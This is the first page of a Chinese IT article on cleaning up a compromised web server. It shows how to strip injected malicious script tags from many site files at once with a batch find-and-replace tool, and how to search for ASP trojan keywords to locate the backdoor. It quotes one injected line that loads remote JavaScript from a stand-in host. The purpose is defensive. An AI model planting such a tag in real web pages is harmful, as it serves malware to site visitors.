首页  登陆  注册  博客集  下载频道  网络硬盘  学院论坛  家园
IT学院 网站地图 网站地图
收藏本站 收藏本站
高级搜索 高级搜索
 新闻IT新闻 互联网 微软 黑客新闻 网络网络协议 故障 网络管理 TCP/IP 无线技术 解决方案 黑客技术 漏洞 软件评测 安全资讯
 数据MSsql Oracle Mysql PL/SQL 备份 系统:Linux vista Windows FTP 防火墙 注册表 服务器行情 服务器应用 解决方案 WEB服务器
 墙纸风景壁纸 游戏壁纸 体育壁纸 汽车壁纸 人文壁纸 影视壁纸 广告壁纸 花卉壁纸 节日壁纸 动漫壁纸 明星壁纸 绘画壁纸 月历壁纸
当前位置: > 主页>服务器>日常技巧>服务器维护的九大必备武器
热门文章排行
 
热门文章排行 戴尔机架全面升级 45纳
四核2U机架结构 戴尔PE2
大空间需自配硬盘 IBMx3
配皓龙8216ES 4U戴尔PE6
单路惠普AMD塔式机ML115
高速SAS存储 戴尔PE2900
完美升级到45纳米 戴尔P
1U性能稳定 戴尔PE1950
高密度支持RAID5 万全R5
SAS阵列护航企业数据 戴
精采文章推荐
 
精采文章推荐 服务器维护的九大必备武
惠普低端ML150再出新机
最新更新文章
 
最新更新文章 SOA的关键是服务构造
灵活定制终端服务器 加
Windows Server 2003搭
服务器维护的九大必备武
联想入门塔式服务器不足
45纳米新四核 金品双路
支持双路双核CPU 惠普DL
带票5万8 IBM高端x3850
提供更大扩展空间 英信N
惠普低端ML150再出新机

服务器维护的九大必备武器

编辑:   来源:  日期:2008-05-05   我要投稿      家园

  服务器毕竟是暴露在公网中,难免会有入侵者的光顾,然后入侵者总是"来也匆匆去也匆匆",从来不会告诉你什么时候他来过,走的时候留下过什么脚印,这给我们服务器管理加了一大难题,如何在变化无常的数据中找出蛛丝马迹,同时我们又应该如何加强防卫工作呢?
  
  带着这些问题,我们开始进入主题"服务器维护的九大必备武器"。

  武器一:批量字符修改工具

  通过后门漏洞注入病毒代码是最为常见的入侵方式,入侵者通常会将首页或所有页面注入类似如下病毒木马代码。

  <script src="http://test.com/test.js"></script>

  如果入侵者只是写入一个首页文件,我们只需要删除即可,可万一入侵者将所有文件都写入了如下代码,此时我们如何是好?如果站点程序上几百、几千或更多时怎么办?一个一个文件来修改删除不现实,我们可以通过一个叫《批量字符修改器》的工具来帮助我们完成清除病毒代码的工作,使用方法非常简单,在查找处输入<script src="http://test.com/test.js"></script>被入侵的病毒代码(如图1),然后替换为选项中留为空,文件类型视程序情况而定,如果想替换全部文件中的病毒代码直接输入"*"号即可。如果只是想修改ASP程序可以输入"*.asp",输入所在文件夹,然后区分大小写、保存备份、仅替换字词及包括子文件夹,这里我们需要把"包括子文件夹" 选上,然后点击全换,程序就会自动更换了。我们可以非常轻松的实现批量修复站点。但是大家一定要在修复前先把数据备份一份,或在替换修复前选上"保存备份"功能,以免在出现错误后可还原。

  

    那么以上做法我们是清除了相应被插入的病毒代码,但是可能过一会入侵者在继续批量修改注入病毒代码,这时我们应该如何是好,通常这种情况是系统没有做好安全加固,稍后我们会介绍加固方面的工具,但现在我们要找到这个ASP木马程序放在那,我们依然使用此工具来操作,通过修改相应的执行命令来排错。

    我们通过查找常见木马程序中的关键词(如表1),然后通过《超级批量字符修改器》来搜索ASP木马最常见的关键词,然后查看文件源代码来分析是否是自己站点程序来排错。

    

表1


    
    那么除了以上我介绍的使用技巧以外,我们还有很多可以利用的地方,大家可以思考一下它还可以怎么加以利用,想到了可以到以下BBS论坛帖子发帖,我们一齐来互动交流学习!

上一页12 3 4 5 6 7 8 下一页


上一篇:联想入门塔式服务器不足九千元  
下一篇:Windows Server 2003搭建VPN服务器
 关键字:  
文章评论】 【收藏本文】 【推荐好友】 【打印本文】 【论坛讨论

   相关文章:

   文章评论:(0条)
  
 请留名: 匿名评论   点击查看所有评论
 

  责任编辑:IT学院  声明:刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。